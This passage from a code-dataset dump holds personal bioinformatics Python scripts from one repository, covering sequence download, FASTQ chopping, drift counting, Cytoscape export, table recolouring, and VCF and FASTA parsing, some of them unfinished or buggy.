accs = acc_df['accs']\n accs = pandas.Series([item for sublist in list(accs) for item in sublist if item != None])\n \n #from here on accs should be a flat series\n if os.path.isfile(log_path):\n with open(log_path, 'r') as f:\n log = f.read()\n \n msk = accs.apply(lambda x: checkForCompletion(log, x))\n accs = accs.iloc[list(msk)]\n \n pool = mp.Pool() \n pool.map(downloadSampleStar, [(downloader_path, output_path, x) for x in accs])\n \n \n \n \nif __name__ == '__main__':\n \n# downloader_path = '/d/data/plasmo/enaBrowserTools/python3/enaDataGet'\n# input_path = '/d/data/plasmo/additional_data/test_accs.txt'\n# output_path = '/d/data/plasmo/additional_data'\n\n downloader_path = '/d/data/plasmo/enaBrowserTools/python3/enaDataGet'\n input_path = '/d/data/plasmo/new_accs.txt'\n output_path = '/home/javi/seq'\n\n\n # downloader_path = '/home/j/jparkin/xescape/programs/enaBrowserTools/python3/enaDataGet'\n # input_path = sys.argv[1]\n # output_path = sys.argv[2]\n \n run(downloader_path, input_path, output_path)\n print('ENADownloader Complete.')\n \n\n#TESTING ONLY \n# print(getAcc('ERS010446'))"
},
{
"alpha_fraction": 0.5662558078765869,
"alphanum_fraction": 0.570878267288208,
"avg_line_length": 33.18421173095703,
"blob_id": "caba34626ea3e04202b56b1f0304be79d57f370c",
"content_id": "d6861a81c878a3265da24075173a09ad1351d469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1298,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 38,
"path": "/ConsensusChopper/Duplicator.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Oct 9, 2013\n\n@author: javi\n'''\nimport os\n\nif __name__ == '__main__':\n #modify these as needed\n directory = input(\"Please specify working directory, in full \\n\")\n identifier = input(\"Please input sequence identifier, not including the @ symbol \\n\")\n length = eval(input(\"Please specify the length of moving window \\n\"))\n overlap = eval(input(\"Please specify the length of overlap \\n\"))\n \n #Do not modify\n os.chdir(directory) \n \n if not (os.path.isdir(directory + \"/Chopped\")):\n os.mkdir(\"Chopped\")\n \n chopdirectory = directory + \"/Chopped\"\n \n log = open(chopdirectory + \"/log.txt\", \"w\")\n log.write(\"Run inputs are: \\n%s\\n%s\\n%s\\n%s\\n\" % (directory, identifier, length, overlap))\n \n onlyfiles = [ f for f in listdir(directory) if isfile(join(directory,f)) ]\n for f in onlyfiles:\n print(\"\\nProcessing %s ...\" % f)\n log.write(\"\\nProcessing %s ... \" % f)\n \n try: \n namesplit = f.split(\".\")\n if namesplit[len(namesplit)-1] == \"fq\":\n chop(directory, chopdirectory, f, identifier, length, overlap, log)\n else:\n log.write(\"\\nerror, %s is not a fq file\" % f)\n except:\n log.write(\"\\nerror, %s is not a fq file\" % f)"
},
{
"alpha_fraction": 0.5479755997657776,
"alphanum_fraction": 0.5646145343780518,
"avg_line_length": 26.015625,
"blob_id": "b160f232be06a6e2841b6694657e46015ebe427e",
"content_id": "600563363368f25f35c449bf34adbb170a946fed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1803,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 64,
"path": "/misc/drift_check.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\r\nscript that checks how much drift there actually is, slowwwly. \r\nusage: drift_check.py [path_to_input] [path_to_output]\r\noutputs a tsv in the format of:\r\n\r\n1 A:10 B:5...\r\n2 A:10 B:3...\r\n\r\n'''\r\ndef parse(path):\r\n\r\n def splitLine(line):\r\n return line.rstrip('\\t').split('\\t')\r\n with open(path, 'r') as input: \r\n data = input.read() \r\n \r\n lines = data.rstrip('\\n').split('\\n')\r\n rows = [splitLine(line) for line in lines]\r\n return rows\r\n\r\ndef count(row):\r\n #given one row, return the test statistics. \r\n\r\n pos = row[1]\r\n bases = row[2:]\r\n\r\n unique_bases = set(bases)\r\n counts = [bases.count(base) for base in unique_bases]\r\n\r\n return (pos, sorted(zip(unique_bases, counts), key=lambda x: x[1], reverse=True))\r\n\r\ndef countSummary(count_results):\r\n #make a summary. how many are drift.\r\n drift_count = 0\r\n\r\n for row in count_results:\r\n pos, counts = row\r\n l = len(counts)\r\n if l <= 1:\r\n drift_count += 1\r\n elif l >= 3:\r\n pass\r\n elif counts[1][1] <= 1:\r\n drift_count += 1\r\n \r\n return '{0} drift position out of {1}, for a total of {2} percent\\n'.format(str(drift_count), str(len(count_results)), str(drift_count / len(count_results) * 100)[:6])\r\n\r\n\r\n\r\ndef makeOutput(row_data):\r\n pos, counts = row_data\r\n return '\\t'.join([str(pos)] + ['{0}:{1}'.format(str(base), str(count)) for base, count in counts])\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n path = sys.argv[1]\r\n out_path = sys.argv[2]\r\n\r\n rows = parse(path)\r\n count_results = [count(row) for row in rows]\r\n\r\n with open(out_path, 'w') as output:\r\n output.write(countSummary(count_results))\r\n output.write('\\n'.join([makeOutput(row) for row in count_results]))\r\n\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.4716723561286926,
"alphanum_fraction": 0.4996587038040161,
"avg_line_length": 24.275861740112305,
"blob_id": "6859d60584ee918295d922398534c32fd2659392",
"content_id": "3ab3149dc15d2e41b8fe78efe8a35ab554c74439",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1465,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 58,
"path": "/misc/JsonWriter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 11, 2017\n\n@author: javi\n'''\n\ndef genData(n):\n import string\n import random\n \n result = {}\n \n nodes = []\n edges = []\n \n colorTable = {}\n color = ['#7fc97f','#beaed4','#fdc086','#ffff99','#386cb0']\n groups = ['A', 'B', 'C']\n ns = 100\n \n names = sorted([''.join(random.sample(string.ascii_letters, 3)) for x in range(n)])\n \n for i, name in enumerate(names):\n node = {}\n node['name'] = name\n node['group'] = groups[i%3]\n node['id'] = str(i)\n node['ids'] = [random.choice(names) for x in range(ns)]\n node['lengths'] = [random.choice([1,2,4,10,15,20]) for x in range(ns)]\n nodes.append(node)\n colorTable[name] = color[i%3]\n \n n = 0 \n for i, source in enumerate(names):\n for j, target in enumerate(names):\n if j > i:\n edge = {}\n edge['source'] = source\n edge['target'] = target\n edge['width'] = str(random.random() * 20)\n n += 1\n edges.append(edge)\n \n \n return {'names': names, 'nodes': nodes, 'edges': edges, 'colorTable': colorTable}\n\nif __name__ == '__main__':\n \n directory = '/home/javi/workspace/popnetd3-front'\n filename = 'data.json'\n outpath = '/'.join([directory, filename])\n \n data = genData(10)\n \n import json\n \n with open(outpath, 'w') as output:\n json.dump(data, output)"
},
{
"alpha_fraction": 0.5338569283485413,
"alphanum_fraction": 0.5504139065742493,
"avg_line_length": 31.26712417602539,
"blob_id": "52cd313c40394699e9c4963e6614d69eff65a77b",
"content_id": "dd47c2bf1e3d3bfa9f629161c00aefb620144ecb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4711,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 146,
"path": "/Proteins/SRSCytoscape.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 19, 2014\n\n@author: javi\n'''\n'''Similar to cytoscape encoder, this file encodes the results of the SRS protein searches into\ncytoscape format for ease of viewing'''\nimport os\nimport re \n\n'''String -> list\nloads clusters into 2D list'''\ndef loadClusters(filepath):\n with open(filepath) as input:\n data = input.read()\n results = []\n \n lines = re.split(\"\\n\", data)[:-1]\n for line in lines:\n elements = line.split(\" \")[1:]\n fixedelements = [re.split(\"[|]\", element)[1] for element in elements]\n results.append(fixedelements)\n return results\n \n\n\n'''String -> String\ngets the color for that family, for the purpose of the node chart.'''\ndef getColor(family):\n familyDict = {'fam_1':'pink', 'fam_2':'red','fam_3':'orange','fam_4':'yellow','fam_5':'green','fam_6':'cyan','fam_7':'purple','fam_8':'brown', 'degen':'black'}\n return familyDict[family]\n\n\n'''2D list -> 1D dictionary\ngets all the nodes in the clusters, numbers them, and make\nsearchable by dictionary'''\ndef getNodes(clusters):\n count = 0\n nodes = {}\n for line in clusters:\n for item in line:\n nodes[item] = count\n count += 1\n return nodes\n\n\n'''2D list, dictionary -> list\ngets all the edges representing the clusters'''\ndef getEdges(clusters, nodes):\n edges = []\n for line in clusters:\n for index, e1 in enumerate(line):\n for e2 in line[index:]:\n edges.append((nodes[e1],nodes[e2]))\n return edges\n\n'''String -> dictionary\ngets the domain info for each node from the\nhmmr files.''' \ndef getNodeDomains(hmmrDirectory):\n files = [ x for x in os.listdir(hmmrDirectory) if os.path.isfile(\"/\".join([hmmrDirectory,x]))]\n nodes = {}\n for file in files:\n with open(\"/\".join([hmmrDirectory, file])) as input:\n data = input.read()\n proteins = re.findall(\"(?s)>>(.+?)\\s+(.+?)\\n(.+?)(?=\\n>>|$)\", data)\n for protein in proteins:\n strain = re.match(\"(.+?)_.*\", protein[0]).group(1)\n name = protein[1]\n srs = re.search(\"SRS.*$\", name)\n if srs:\n name = srs.group(0)\n name = \"{0}_{1}\".format(strain, name)\n \n domains = re.findall(\"Family\\s+(.+?)\\s\", protein[2])\n degens = re.findall(\"Degen\\s+(.+?)\\s\", protein[2])\n \n fixedDomains = []\n for domain, degen in zip(domains, degens):\n if degen=='True':\n fixedDomains.append(\"degen\")\n elif degen=='False':\n fixedDomains.append(domain)\n else:\n raise Exception(\"bad degen value\")\n \n nodes[protein[0]] = (name, fixedDomains)\n return nodes\n\n# '''dict (nodes) -> dict\n# aligns the domains to easily spot differences.'''\n# def alignDomains(nodes):\n# \n\n\n\ndef encode(clusters, hmmrDirectory, name):\n print(name + \" is being encoded\")\n #nodes are two-tuples consisting of id and label\n nodes = getNodes(clusters)\n edges = getEdges(clusters, nodes)\n nodeComp = getNodeDomains(hmmrDirectory)\n \n #prep the texts\n nodeTexts = [getNodeText(index, nodeComp[node]) for node, index in sorted(nodes.items(), key=lambda x: x[1])]\n edgeTexts = [getEdgeText(edge) for edge in sorted(edges)]\n \n print(\"{0} nodes and {1} edges. Writing...\".format(len(nodeTexts), len(edgeTexts)))\n \n text = \"\\\n<?xml version=\\\"1.0\\\"?>\\n\\\n <graph label=\\\"{0}\\\"\\n\\\n xmlns:dc=\\\"http://purl.org/dc/elements/1.1/\\\"\\n\\\n xmlns:xlink=\\\"http://www.w3.org/1999/xlink\\\"\\n\\\n xmlns:rdf=\\\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\\\"\\n\\\n xmlns:cy=\\\"http://www.cytoscape.org\\\"\\n\\\n xmlns=\\\"http://www.cs.rpi.edu/XGMML\\\"\\n\\\n directed=\\\"0\\\" >\\n\\\n{1}\\n\\\n{2}\\n\\\n </graph>\".format(name, \"\\n\".join(nodeTexts), \"\\n\".join(edgeTexts))\n return text\n\n\ndef getNodeText(index, infoTuple):\n text = \"\\\n <node label=\\\"{1}\\\" id=\\\"{0}\\\" >\\n\\\n <att name=\\\"name\\\" type=\\\"string\\\" value=\\\"{1}\\\"/>\\n\\\n <att name=\\\"Gradient\\\" type=\\\"string\\\" value=\\\"stripechart: colorlist="{2}"\\\"/>\\n\\\n <graphics h=\\\"10\\\" w=\\\"10\\\"/>\\n\\\n </node>\\n\".format(index, infoTuple[0], \",\".join([getColor(x) for x in infoTuple[1]]))\n return text\n\n\n'''(String, String, int) -> String\nsame.'''\ndef getEdgeText(edge):\n \n if edge[0] == edge[1]:\n return \"\"\n \n text = \"\\\n <edge source=\\\"{0}\\\" target=\\\"{1}\\\" >\\n\\\n <graphics width=\\\"1\\\"/>\\n\\\n </edge>\\n\".format(edge[0], edge[1])\n return text\n"
},
{
"alpha_fraction": 0.5068807601928711,
"alphanum_fraction": 0.5198776721954346,
"avg_line_length": 23.148147583007812,
"blob_id": "eee316521a3cab7b27f2470efa80fb34a98378cc",
"content_id": "c05b599357199f25c6abafb6800c07b764e7c0ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1308,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 54,
"path": "/misc/NCBIDownloader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Mar 15, 2017\n\nDownloads some genomes from ncbi using a .csv table file\n\n@author: javi\n'''\nimport re \nfrom subprocess import call\nfrom os import chdir\n\ndef parseCSV(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n entries = []\n \n for line in re.split('\\n', data):\n if line == '': \n continue\n \n entries.append([re.sub(r'^\"|\"$', '', s) for s in re.split(',', line)]) #strips quotes\n \n legend = entries.pop(0)\n \n return legend, entries\n\n\ndef download(info):\n #downloads files gives a parsed table of info\n name_index = 1\n url_index = -2\n alt_url_index = -1\n\n \n for entry in info:\n if not entry[url_index] == '-':\n call(['wget', '-r', '-nH', '--cut-dirs=6', entry[url_index]])\n f_name = re.split('/', entry[url_index])[-1]\n else:\n call(['wget', '-r', '-nH', '--cut-dirs=6', entry[alt_url_index]])\n f_name = re.split('/', entry[alt_url_index])[-1]\n \n call(['mv', f_name, re.sub(' |/', '', entry[name_index])])\n \nif __name__ == '__main__':\n \n directory = '/data/new/javi/neis/ngo2'\n table = 'ngo_list2.csv'\n \n chdir(directory)\n info = parseCSV('/'.join([directory, table]))\n download(info[1])\n "
},
{
"alpha_fraction": 0.6971935033798218,
"alphanum_fraction": 0.7045789957046509,
"avg_line_length": 19.454545974731445,
"blob_id": "33a78498af57b08687742b0480c2876a8b880d15",
"content_id": "2e7dcfc98a7379fb9272d5fe75475b7a360c64a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 677,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 33,
"path": "/BamSorter/BamSorter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Oct 3, 2013\n\n@author: javi\n'''\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\n\n\n\n\nif __name__ == '__main__':\n \n#init variables\n folder=\"\"\n\n#load all bam files. probably use bamtools to parse them into txt files. \n\n#set one of them as the \"lead\". The first one will do. \n\n#define a regex to represent a \"block\". in bam files this is just one tab delimited line. \n\n#read the reference location and start site in the lead block, then search for that block in the other files.\n\n#grab the results and write them into one file. \n\n#do this until the end of file is reached. \n\n\n#new function? call indels for each group of blocks. \n\n"
},
{
"alpha_fraction": 0.5635528564453125,
"alphanum_fraction": 0.5742725729942322,
"avg_line_length": 22.35714340209961,
"blob_id": "027be8f105fe8a6d24cf8da95cd78535ec72e821",
"content_id": "2e6449207fae65d2717756c2d46ae6f45f0bb94c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 653,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 28,
"path": "/misc/miottoReader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jan. 3, 2019\n\n@author: Javi\n'''\nimport re\nimport pandas\n\ndef read(path):\n \n line_template = '(?<!Burkina)(?<!Cambodia)(?<!,)\\s(?!$)' \n df = pandas.read_csv(path, sep=line_template, names=['num', 'accession', 'origin', 'code'], skiprows = 1)\n \n print(df.iloc[3])\n \n \n #take off end whitespace and fix columns\n df['code'] = df['code'].map(lambda x: str(x).strip())\n return df\n\n \nif __name__ == '__main__':\n \n path = '/d/data/plasmo/additional_data/raw_accs.txt'\n output_path = '/d/data/plasmo/additional_data/sec_accs.txt'\n \n df = read(path)\n df.to_csv(output_path, sep='\\t', index=False)"
},
{
"alpha_fraction": 0.45804598927497864,
"alphanum_fraction": 0.4985632300376892,
"avg_line_length": 27.52458953857422,
"blob_id": "2bbc52d98eb18624a65b74e575cb1e6304c171b2",
"content_id": "229d25afac35e03c7806c714f225b4b41a5dcf33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3480,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 122,
"path": "/misc/TableChanger.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 28, 2016\n@author: javi\n'''\nimport re\n\n'''\nTakes path\nReturns (header, body) as separated lines\nNo further modifications\n'''\n\ndef readTable(filepath):\n with open(filepath, 'r') as input:\n raw_text = input.read()\n \n line_split = re.split('\\n', raw_text)\n header = line_split[0]\n body = line_split[1:-1]\n \n return header, body\n \n'''\nrequires the table tuple (header, body) from readTable\nreturns the modified tuple in the same format\n'''\ndef reverseOrder(table): \n header, body = table\n \n grad_pattern = '(?<=colorlist=\\\"\\\")(.+?)(?=\\\")'\n val_pattern = '(?<=\\\")([0-9\\.]+?[|].+?)(?=\\\")'\n results = []\n \n for line in body:\n grad = re.search(grad_pattern, line).group(1)\n vals = re.search(val_pattern, line).group(1)\n grad_list = re.split(',', grad)\n val_list = re.split('\\|', vals)\n \n grad_list.reverse()\n val_list.reverse()\n \n new_grad = ','.join(grad_list)\n new_val = '|'.join(val_list)\n \n #sub the old strings with the new ones.\n mod_line = re.sub(grad_pattern, new_grad, line)\n mod_line2 = re.sub(val_pattern, new_val, mod_line)\n \n results.append(mod_line2)\n \n return (header, results)\n\ndef changeColor(input_path, color_dict):\n \n def colrep(matchobj):\n return color_dict[matchobj.group(0)]\n \n with open(input_path, 'r') as input:\n data = input.read()\n \n for color in color_dict:\n data = re.sub(color, colrep, data)\n \n return data\n \n##helpers\n\n\nif __name__ == '__main__':\n\n# ## To Reverse Order\n# directory = '/data/new/javi/reshape'\n# file_name = 'plasmo_partial.csv'\n# output_name = 'rev_plasmo_partial.csv'\n# \n# directory = '/data/new/javi/toxo/SNPSort80/matrix/cytoscape'\n# file_name = 'new_table.csv'\n# output_name = 'new_table2.csv'\n# \n# path = '/'.join([directory, file_name])\n# output_path = '/'.join([directory, output_name])\n# \n# with open(output_path, 'w') as output:\n# header, body = reverseOrder(readTable(path))\n# output.write('\\n'.join([header] + body))\n \n ## To change color\n directory = '/d/data'\n file_name = 'type2nodes_2.csv'\n output_name = 'type2nodes_3.csv'\n \n path = '/'.join([directory, file_name])\n output_path = '/'.join([directory, output_name])\n \n# color_dict = {'#AA3F00' : '#E31A1C', #blue\n# '#AAFE55' : '#FDBF6F', #red\n# '#FED455' : '#FF7F00', #green\n# '#006AAA' : '#CAB2D6', #orange\n# '#00AA6A' : '#A6CEE3',\n# '#AA003F' : '#1F78B4',\n# '#15AA00' : '#B2DF8A',\n# '#9400AA' : '#33A02C',\n# '#94AA00' : '#FB9A99',}\n \n# color_dict = {'#E31A1C' : '#E41A1C', #blue\n# '#FDBF6F' : '#377EB8', #red\n# '#FF7F00' : '#4DAF4A', #green\n# '#CAB2D6' : '#984EA3', #orange\n# '#A6CEE3' : '#FF7F00',\n# '#1F78B4' : '#FFFF33',\n# '#B2DF8A' : '#A65628',\n# '#33A02C' : '#F781BF',\n# '#FB9A99' : '#00FFF3',}\n \n color_dict = {'#FF00BF' : '#FF9933',\n '#00FEFF' : '#FF0000'}\n \n with open(output_path, 'w') as output:\n output.write(changeColor(path, color_dict))\n \n print('Table changed.')\n"
},
{
"alpha_fraction": 0.5180920958518982,
"alphanum_fraction": 0.5290570259094238,
"avg_line_length": 31.630630493164062,
"blob_id": "08daf323340925278e837db045cc8482193a5e4b",
"content_id": "3be84145488d96422963b76e72f9f8b5ca4d31fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3648,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 111,
"path": "/Proteins/Chartmaker.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 20, 2014\n\n@author: Javi\n'''\nimport re\n'''makes some charts based on the clusters. borrows the loadclusters method from\nSRSCytoscape. really should extract that.'''\n\n'''(list, 2D list) -> matrix\nmakes a chart that describes which SRS is present in which strain'''\ndef distributionChart(translatedMatrix, strainList):\n resultMatrix = []\n clusters = translatedMatrix\n iterated = []\n \n \n for cluster in clusters:\n #presort into both separate names\n separated = {}\n for element in cluster:\n if element[1] in separated:\n separated[element[1]].append(element[0])\n else:\n separated[element[1]] = [element[0]]\n \n for name, strains in separated.items(): \n results = {}\n\n for strain in strainList:\n results[strain] = 0\n\n for strain in strains:\n results[strain] += 1\n \n resultMatrix.append((name, results))\n #add the .1 and stuff\n sortedResults = sorted(resultMatrix, key=lambda x: x[0])\n return (sortedResults, strainList)\n \n''' returns the matrix (with IDs turned into tuples) and the strain list\nmake a 2D matrix of tuples, stating the strain and the SRS name'''\ndef translateMatrix(data, composition):\n strainList = []\n translatedMatrix = []\n \n for cluster in data:\n current = []\n \n for element in cluster:\n \n nameSplit = re.split(\"_\", composition[element][0])\n strain = nameSplit[0]\n name = nameSplit[1]\n if strain not in strainList:\n strainList.append(strain)\n current.append((strain, name))\n translatedMatrix.append(current)\n \n return (translatedMatrix, strainList)\n\ndef printDistributionChart(matrix, strainList, outfile):\n strainList.insert(0,\"\")\n with open(outfile, \"w\") as output:\n previous = \"\"\n count = 0\n output.write(\",\".join(sorted(strainList)) + \"\\n\")\n for item in matrix:\n header = item[0]\n if header == previous:\n header += \".{0}\".format(str(count+1))\n count += 1\n else:\n previous = item[0]\n count = 0\n \n body = header\n for entry in sorted(item[1].items(), key=lambda x: x[0]):\n body+=\",{0}\".format(str(entry[1]))\n output.write(body + \"\\n\")\n \ndef domainStats(composition):\n results = {}\n for ID, item in composition.items():\n strain = re.split(\"_\", ID)[0]\n domains = item[1]\n if strain not in results:\n results[strain] = {}\n for domain in domains:\n if domain not in results[strain]:\n results[strain][domain] = 0\n results[strain][domain] += 1\n return results\n\ndef printDomainStats(data, outfile):\n with open(outfile, \"w\") as output:\n famList=[\"fam_{0}\".format(str(x)) for x in range(1, 9)]\n header=\",\" + \",\".join(famList) + \",Total\\n\"\n output.write(header + \"\\n\")\n \n for strain, domainInfo in sorted(data.items()):\n output.write(strain + \",\")\n info = []\n for fam in sorted(famList):\n if fam in domainInfo:\n info.append(str(domainInfo[fam]))\n else:\n info.append(str(0))\n total = sum([int(x) for x in info])\n info.append(str(total))\n output.write(\",\".join(info) + \"\\n\")\n \n \n "
},
{
"alpha_fraction": 0.5343314409255981,
"alphanum_fraction": 0.545172929763794,
"avg_line_length": 22.634145736694336,
"blob_id": "06180a9e16bb9b61cb8a1effaa38de8c6f454950",
"content_id": "0bd78a96d6807caf183310cdf009b4adbf810e6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1937,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 82,
"path": "/misc/TextParser.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 26, 2017\n\n@author: javi\n\nParses a text file containing lines of text into a popnet-readable thing\n\nwas for the birthday card network\n'''\n\nimport re\n\ndef read(path):\n with open(path, 'r') as input:\n data = input.read()\n \n \n pattern = '@(.+?)\\n(.+?)$'\n entries = re.split('\\n\\n', data)[:-1]\n \n result = {}\n total = set() #all words\n \n for entry in entries:\n match = re.match(pattern, entry)\n name = match.group(1)\n text = match.group(2)\n words = toWords(text)\n result[name] = words\n total.update(words)\n \n return result, total\n\ndef toWords(string):\n \n string = re.sub('[^a-zA-Z0-9 ]', '', string)\n words = set(re.split('\\s', string))\n return words\n \ndef makeTable(result, total, path, legpath):\n \n def translate(word, name):\n if word in result[name]: return 'T'\n else: return '-'\n \n strings = []\n legstrings = []\n dist = 10000\n chrname = 'STREP_CHRI'\n \n names = sorted(result.keys())\n strings.append('\\t'.join(['', ''] + names))\n \n index = 0\n for word in sorted(total):\n tmp = [translate(word, x) for x in names]\n if tmp.count('T') <= 1: continue\n tmp.insert(0, str(index * dist))\n tmp.insert(0, chrname)\n strings.append('\\t'.join(tmp))\n legstrings.append('\\t'.join([str(index * dist), word]))\n index += 1\n \n with open(path, 'w') as output:\n output.write('\\n'.join(strings))\n \n with open(legpath, 'w') as output:\n output.write('\\n'.join(legstrings))\n\nif __name__ == '__main__':\n \n dir = '/home/javi/Desktop/bt'\n file = 'input.txt'\n output = 'output.txt'\n legend = 'legend.txt'\n \n inpath = '/'.join([dir, file])\n outpath = '/'.join([dir, output])\n legpath = '/'.join([dir, legend])\n \n result, total = read(inpath)\n makeTable(result, total, outpath, legpath)"
},
{
"alpha_fraction": 0.6204460859298706,
"alphanum_fraction": 0.629368007183075,
"avg_line_length": 33.93506622314453,
"blob_id": "910ea6450750533f31e56dd928bdf87e15509b5a",
"content_id": "ce2c8a73ff80941dfadd57511abf65d77322187a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2690,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 77,
"path": "/VCFreader/VCFReader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Oct 4, 2013\n@author: javi\n'''\nimport os\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\n\n''' \nRegarding the Regexs: \n1. Flags: Multiline, Dotall\n#(?:\\w+?\\t){9} skips all the ##INFO stuff, and finds the line with the column headers.\n then grabs all the headers except the first 9 (which are predefined)\n \n((?:\\w+?\\t)+\\w+?) after skipping the first 9, this part grabs all the remaining headers (sample names) as group(1)\n\n\\n(.*) Skips the newline character, and grabs the remainder of the document (the reads) as group(2)\n\n2. Flags: None\nSeparates out each sample name (from the whole line) and puts them into an array.\n\n3. Separates out each read and put into array\n\nThis serves to help with mapping each number to the sample. But I wonder if we even need to.. \n\n'''\n\ndef analyzeVCF(data):\n separatedata = re.search(\"(?ms)#(?:\\w+?\\t){9}((?:\\w+?\\t)+\\w+?)\\n(.*)\", data)\n if separatedata:\n samplelist = re.findall(\"\\w+?(?=(?:\\t|$))\", separatedata.group(1))\n readlist = re.split(\"\\n\", separatedata.group(2))\n\n \n pass \n\n\nif __name__ == '__main__':\n\n#Load the VCF file.\n path = \"\"\n directory=\"\"\n filename=\"\"\n pathfrag = re.match(\"(.*)/(.*?)\\.(.*)$\")\n try:\n if pathfrag == True and (pathfrag.group(3) == \"vcf\" or pathfrag.group(3) == \"bcf\"):\n directory = pathfrag.group(1)\n filename = pathfrag.group(2)\n os.chdir(directory)\n os.mkdir(\"%s/analyzed\" % directory)\n#Loads the entire file to memory, then passes it to the analyzeVCF function to do the work. \n#analyzeVCF should return a single string to be written to the output file at directory/analyzed/filename.txt\n data = open(\"filename\",\"r\").read()\n open(\"analyzed/%s.txt\",\"w\").write(analyzeVCF(data)) \n else\n print \"%s is not a valid file\" % path\n sys.exit()\n except IndexError:\n print \"%s is not a valid file path\" % path\n sys.exit()\n \n\n\n#Set Chromosome Track (scaffolds too I guess). You'll also need to set the map for the samples. \n\n#Set read head, increment by 500 each time.\n\n#Because the VCF should be sorted by chromosome number, just read by line. Each line will either count for this group or the next one. \n\n#For each group, you'll need to store all the type information from the genotype column of the VCF file. This will probably be in the form of an array. \n\n#You'll need a map to link the information to filename, as they would not be in the same line. The order is the same though.. \n\n\nseparatedata = re.search(\"(?m)#(?:\\w+?\\t){9}((?:\\w+?\\t)+\\w+?)\\n((?:.*\\n)+)\", data)\n"
},
{
"alpha_fraction": 0.5220851302146912,
"alphanum_fraction": 0.5360127091407776,
"avg_line_length": 23.598039627075195,
"blob_id": "8ca3df2a38088409864d78f9c46ac51784de388d",
"content_id": "60c1c5800b648a36c2a97450195ae11acf7b6fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2513,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 102,
"path": "/misc/FasAnalyzer.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 16, 2017\n\n@author: javi\n\n\nAnalyzes the content of multi sequence fastas to see what's in there.\n'''\n\nimport re\n\n\ndef read(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n pattern = '(?ms)^>(.+?)\\n'\n headers = re.findall(pattern, data)\n\n return headers\n\ndef findGenes(headers):\n '''\n finds how many genes are referred to in the file given all the headers\n '''\n \n pattern = '(?s)^.+?\\+ (.+?)$'\n genes = set()\n \n for line in headers:\n gene = re.search(pattern, line).group(1)\n if gene not in genes:\n genes.add(gene)\n \n return genes\n\ndef findCoreGenes(genes, path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n core_genes = set()\n \n for ind, gene in enumerate(genes):\n print('Core genes: {0} processed out of {1}'.format(ind, len(genes)), end=\"\\r\")\n pattern = '(?s){}\\n(.+?)\\n'\n seqs = re.findall(pattern, data)\n for seq in seqs:\n if re.search('[^-]', seq):\n core_genes.add(gene)\n break\n \n return core_genes\n\ndef findAccGenes(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n blocks = re.split('\\>', data)[1:]\n acc_genes = set()\n \n for ind, block in enumerate(blocks):\n print('Acc genes: {0} blocks processed out of {1}'.format(ind, len(blocks)), end=\"\\r\")\n pattern = '(?ms).+?[+] (.+?)\\n(.+?)\\n$'\n match = re.search(pattern, block)\n gene = match.group(1)\n body = match.group(2)\n \n if gene not in acc_genes and not re.search('[^=-]', body):\n\n# print(body)\n# print(gene)\n# print()\n acc_genes.add(gene)\n print()\n return acc_genes\n \nif __name__ == '__main__':\n \n dir = '/data/new/javi/neis/job'\n file = 'BIGSdb_166607_1494887514_31621.xmfa'\n# file = 'cgMLST_aligned.xmfa'\n \n path = '/'.join([dir, file])\n headers = read(path)\n print('finding genes...')\n genes = findGenes(headers)\n# print('finding core genes...')\n# core_genes = findCoreGenes(genes, path)\n# acc_genes = findAccGenes(path)\n# print(len(genes) - len(acc_genes))\n# 